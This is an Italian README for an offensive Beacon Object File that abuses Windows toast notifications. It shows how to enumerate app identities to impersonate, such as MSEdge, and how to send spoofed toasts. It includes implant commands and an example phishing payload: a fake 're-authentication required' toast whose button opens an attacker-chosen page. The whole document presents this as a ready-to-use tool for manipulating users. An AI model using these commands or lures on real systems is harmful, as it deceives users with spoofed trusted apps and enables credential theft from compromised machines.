
abuso di notifiche toast di Windows per divertimento e manipolazione dell'utente
Un Beacon Object File (BOF) per inviare notifiche toast di Windows. Si abbina al post del blog per il contesto completo e i casi d'uso.
Enumera gli AUMID (Application User Model ID) registrati sul sistema. Usalo per trovare un'identità adatta da prendere in prestito prima di inviare un toast.
inline-execute toastnotify.o go getaumid
Output di esempio:
[Notifications\Settings - HKCU]
Microsoft.Windows.Explorer
MSEdge
com.squirrel.AnthropicClaude.claude
...
[Notifications\Settings - HKLM]
...
com.squirrel.AnthropicClaude.claude
...
Invia una notifica toast standard con un titolo e un testo. Costruisce l'XML internamente usando ToastGeneric.
inline-execute toastnotify.o go sendtoast "MSEdge" "Title" "Notification body"
Invia un toast da un payload XML arbitrario codificato in base64. È qui che accadono le cose interessanti con il supporto completo dei modelli: azioni, collegamenti di protocollo, immagini, barre di avanzamento, input di selezione, immagini hero. E c'è un'app per quello!
inline-execute toastnotify.o go custom "MSEdge" "<base64-encoded-xml>"
Esempio di payload prima della codifica:
<toast>
<visual>
<binding template="ToastGeneric">
<text>Action Required</text>
<text>Your session requires re-authentication. Click to continue.</text>
</binding>
</visual>
<actions>
<action content="Continue"
activationType="protocol"
arguments="https://your-page-here.com"/>
</actions>
</toast>
Codificalo e divertiti.